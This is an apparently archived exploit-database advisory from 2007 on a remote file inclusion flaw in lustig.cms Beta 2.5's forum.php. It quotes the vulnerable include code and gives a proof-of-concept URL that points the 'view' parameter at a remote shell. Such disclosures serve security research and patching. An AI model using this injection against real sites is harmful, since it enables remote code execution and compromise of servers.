lustig.cms Beta 2.5 - 'forum.php?view' Remote File Inclusion

EDB-ID:

4461


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-09-27


# lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion Vulnerabilities

# D.Scripts : http://dfn.dl.sourceforge.net/sourceforge/lustig-cms/lustig.cms_beta_2.5_2.zip

# V.Code : Line 12 . 13 . 14

#  if(isset($view))
#  {
#  include $view;

# POC : /forum/forum.php?view=Shell 

# milw0rm.com [2007-09-27]